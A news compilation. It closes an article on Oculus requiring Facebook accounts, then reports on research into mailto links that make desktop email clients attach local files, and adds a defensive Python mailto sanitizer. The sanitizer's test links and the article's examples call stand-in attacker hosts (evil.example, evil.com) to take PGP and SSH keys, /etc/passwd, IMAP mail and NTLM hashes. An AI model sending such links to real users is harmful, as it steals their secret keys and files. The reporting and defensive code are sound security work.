    “We know that social VR has so much more to offer, and this change will make it possible to integrate many of the features people know and love on Facebook,” the post said. “It will also allow us to introduce more Facebook powered multiplayer and social experiences coming soon in VR.”
    With the privacy of its users always front of mind for the Zuckerberg empire, users can choose what information about their VR activity is posted to Facebook, Oculus said.
    “Using a VR profile that is backed by a Facebook account and authentic identity helps us protect our community and makes it possible to offer additional integrity tools,” the post said. “For example, instead of having a separate Oculus Code of Conduct, we will adopt Facebook’s Community Standards as well as a new additional VR-focused policy. This will allow us to continue to take the unique considerations of VR into account while offering a more consistent way to report bad behaviour, hold people accountable, and help create a more welcoming environment across our platforms.”
    Oculus said that when a user logs in using a Facebook account, Facebook will use information related to the use of VR and other Facebook products to “provide and improve your experience”. It will also be used to show the user personalised content, including ads.
    Facebook this year is ending sales of the Oculus Go, its low-end virtual reality headset, which offers only 3DOF (three degrees of freedom) tracking.
    The company said in June that it is abandoning the relatively cheap device because users have made it clear “that 6DOF feels like the future of VR”.
    Oculus was scooped up by Facebook in March 2014, for approximately $2 billion.
    At the time of the acquisition, Mark Zuckerberg said that while mobile is the platform of today, his company is getting ready for the platforms of tomorrow.
    “Oculus has the chance to create the most social platform ever, and change the way we work, play, and communicate.”


    Some email clients are vulnerable to attacks via 'mailto' links

    A lesser-known technology known as “mailto” links can be abused to launch attacks on the users of email desktop clients.
    The new attacks can be used to secretly steal local files and have them emailed as attachments to attackers, according to a research paper published last week by academics from two German universities.
    Attacking mailto links
    The “vulnerability” at the heart of these attacks is how email clients implemented RFC6068 — the technical standard that describes the ‘mailto’ URI scheme.
    Mailto links are a special type of link, usually supported by web browsers and email clients, which, when clicked, open a new email compose/reply window rather than a new web page.
    RFC6068 says that mailto links can support various parameters. When used with mailto links, these parameters will pre-fill the new email window with predefined content.
    For example, a mailto link like the one below will open a new email compose window with the destination email already pre-filled with “bob@host.com,” a subject line of “Hello,” and an email text of “Friend.”
    Click me! (links to mailto:bob@host.com?subject=Hello&body=Friend)
    The RFC6068 (mailto) standard supports a large set of parameters for customizing mailto links, including rarely used options that can be used to control the email’s body text, reply-to email address, and even email headers.
    However, even the standard itself warns software engineers against supporting all parameters, recommending that apps only support a few “safe” options.

    Image: Müller et al.
    Some email clients were supporting dangerous mailto parameters
    But in a research paper named “Mailto: Me Your Secrets”, academics from Ruhr University Bochum and the Münster University of Applied Sciences said they found email clients that implement some of the standard’s most exotic parameters, opening their users to attack.
    In particular, researchers looked at the mailto “attach” or “attachment” parameters that allow mailto links to open new email compose/reply windows with a file already attached.
    Academics argue that attackers can send emails containing boobytrapped mailto links or place boobytrapped mailto links on websites that, when clicked, could surreptitiously append sensitive files to the email window.
    If the user composing the email does not spot the file attachment, attackers could receive sensitive files from the user’s system, such as encryption (PGP) keys, SSH keys, config files, cryptocurrency wallet files, password stores, or important business documents — as long as they’re stored at file paths known by an attacker.
    Academics said they tested several versions of this data exfiltration technique, such as:
    Using exact paths for the desired files.
    Using wildcard characters (*) to attach/steal multiple files at once.
    Using URLs for internal network shares (\\company_domain\file).
    Using URLs pointing the victim to an attacker’s rogue SMB server, so the victim leaks its NTLM authentication hash to the attacker (\\evil.com\dummy\file).
    Using IMAP links to steal email messages from a user’s entire IMAP email inbox (imap:///fetch>UID>/INBOX).
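    As an added example, not code from the paper or from any of the email clients named in this article, the following shows how a client-side mailto handler can follow RFC 6068’s advice: split the URI on “?” and “&” before percent-decoding, honour only a small allowlist of header fields, and refuse the attach/attachment fields outright while recording which of the exfiltration variants above a link was attempting (local path, wildcard, UNC/SMB share, IMAP fetch). The allowlist, the function names and the sample links are this example’s own assumptions.

```python
# Added example (not from the paper or from any email client discussed above):
# a mailto: handler that parses the URI the way RFC 6068 prescribes and honours
# only a small allowlist of header fields, rejecting the 'attach'/'attachment'
# vectors described in the article. Sample URIs are constructed for illustration.
from urllib.parse import unquote

# RFC 6068 advises honouring only a small set of header fields; it names Subject,
# Keywords and Body as the ones believed to be both safe and useful. Treating the
# recipient fields as acceptable as well is this example's own policy choice.
SAFE_HEADERS = frozenset({"to", "cc", "bcc", "subject", "body", "keywords"})
# Non-standard fields that turned 'mailto' into a file-exfiltration primitive.
ATTACHMENT_HEADERS = frozenset({"attach", "attachment"})


def parse_mailto(uri):
    """Split a mailto URI into (recipients, [(header, value), ...]).

    Order matters: RFC 6068 says to split on '?' and '&' *before*
    percent-decoding, so an encoded '%26' inside a value can never grow
    into a new header field.
    """
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.strip().lower() != "mailto":
        raise ValueError("not a mailto URI")
    addr_part, _, query = rest.partition("?")
    recipients = [unquote(a) for a in addr_part.split(",") if a]
    headers = []
    if query:
        for field in query.split("&"):
            name, _, value = field.partition("=")
            headers.append((unquote(name).strip().lower(), unquote(value)))
    return recipients, headers


def classify_header(name, value):
    """Return a reason string if the header must be dropped, else None.

    The attachment checks mirror the exfiltration variants above: UNC/SMB
    paths (file theft or NTLM credential leak), IMAP fetch URLs, wildcards
    and plain local paths. The first matching reason is reported.
    """
    if name in ATTACHMENT_HEADERS:
        v = value.strip()
        if v.startswith("\\\\") or v.startswith("//") or v.lower().startswith("smb:"):
            return "attachment from network share (UNC/SMB): file theft or NTLM leak"
        if v.lower().startswith("imap:"):
            return "attachment fetched over IMAP: mailbox theft"
        if "*" in v:
            return "wildcard attachment: bulk file theft"
        return "local file attachment"
    if name not in SAFE_HEADERS:
        return "header field outside the safe allowlist"
    return None


def sanitize_mailto(uri):
    """Return (recipients, kept_headers, rejected) for a mailto URI.

    kept_headers maps header name -> value for fields the compose window may
    be pre-filled with; rejected lists (name, reason) for everything dropped.
    """
    recipients, headers = parse_mailto(uri)
    kept, rejected = {}, []
    for name, value in headers:
        reason = classify_header(name, value)
        if reason is not None:
            rejected.append((name, reason))
        elif name == "to":
            # RFC 6068: a 'to' hfield adds to the recipients from the address part.
            recipients.extend(a for a in value.split(",") if a)
        else:
            kept[name] = value
    return recipients, kept, rejected


# Constructed sample links: the benign one from the article, four boobytrapped
# variants modelled on the exfiltration techniques listed above, and one that
# tries to smuggle an attach field through an encoded '&' in the body.
SAMPLE_LINKS = [
    "mailto:bob@host.com?subject=Hello&body=Friend",
    "mailto:drop@evil.example?subject=Re%3A%20invoice&attach=~/.gnupg/secring.gpg",
    "mailto:drop@evil.example?attachment=%2Fhome%2Fuser%2F.ssh%2F*",
    "mailto:drop@evil.example?attach=%5C%5Cevil.example%5Cdummy%5Cfile",
    "mailto:drop@evil.example?attach=imap:///fetch%3EUID%3E/INBOX",
    "mailto:bob@host.com?body=hi%26attach%3D%2Fetc%2Fpasswd",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        rcpts, kept, rejected = sanitize_mailto(link)
        print(link)
        print("  to:", rcpts, "kept:", kept, "rejected:", rejected)
```

    The last sample link is the caveat worth checking in any real handler: because the split on “&” happens before percent-decoding, the body is kept verbatim as “hi&attach=/etc/passwd” and no attachment field ever comes into existence. A handler that decodes first and splits afterwards would see a second field and, if it honoured attach, would silently add the file.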
    The research team said it tested 20 email clients for their attack scenario and found that four clients were vulnerable. This list included:
    Evolution, the default email client for the GNOME desktop environment on Linux (see CVE-2020-11879)
    KMail, the default email client for KDE desktop environments on Linux (see CVE-2020-11880)
    IBM/HCL Notes on Windows (see CVE-2020-4089)
    Older versions of Thunderbird on Linux (now patched)
    All the issues found were reported to the respective development teams and patched this spring and summer, according to the CVE entries listed above.
    Additional research on attacking encrypted PGP and S/MIME
    However, the research team’s full paper was not focused on documenting the implementations of the mailto URI scheme in email clients. This is a small portion of the paper that we chose to highlight in this article.
    In their paper, academics primarily focused on finding bugs in email clients that could be abused to bypass (not break) email encryption technologies such as PGP and S/MIME.
    Researchers said they were successful in finding three new attack techniques that leveraged bugs in email clients to steal PGP private keys from victims, which would then allow attackers to decrypt the victim’s entire communications.
    The three new attack classes are listed below, with the third (key exfiltration) being the technique we described above in greater detail, as it can be used to steal more than encryption keys, such as all sorts of other files:
    Key replacement – Email clients may automatically install certificates contained in S/MIME communications. Such a feature, if available, can be misused to silently replace the public key used to encrypt messages to a certain entity.
    Dec/Sig oracles – Using standard mailto parameters, email clients can be tricked into decrypting ciphertext messages or signing arbitrary messages and exfiltrating the result to an attacker-controlled IMAP server, if the email client automatically saves message drafts.
    Key exfiltration – If implemented by the email client, an attacker can create a specially crafted mailto URI scheme, in order to force the inclusion of the OpenPGP private key file on disk into an email to be sent back to the attacker.
    All in all, academics said that eight of the 20 email clients they tested for their research project were vulnerable to at least one of the three attacks listed above. Please see the figure and its legend below for a breakdown of what email client apps are vulnerable to what, and how.

    Image: Müller et al.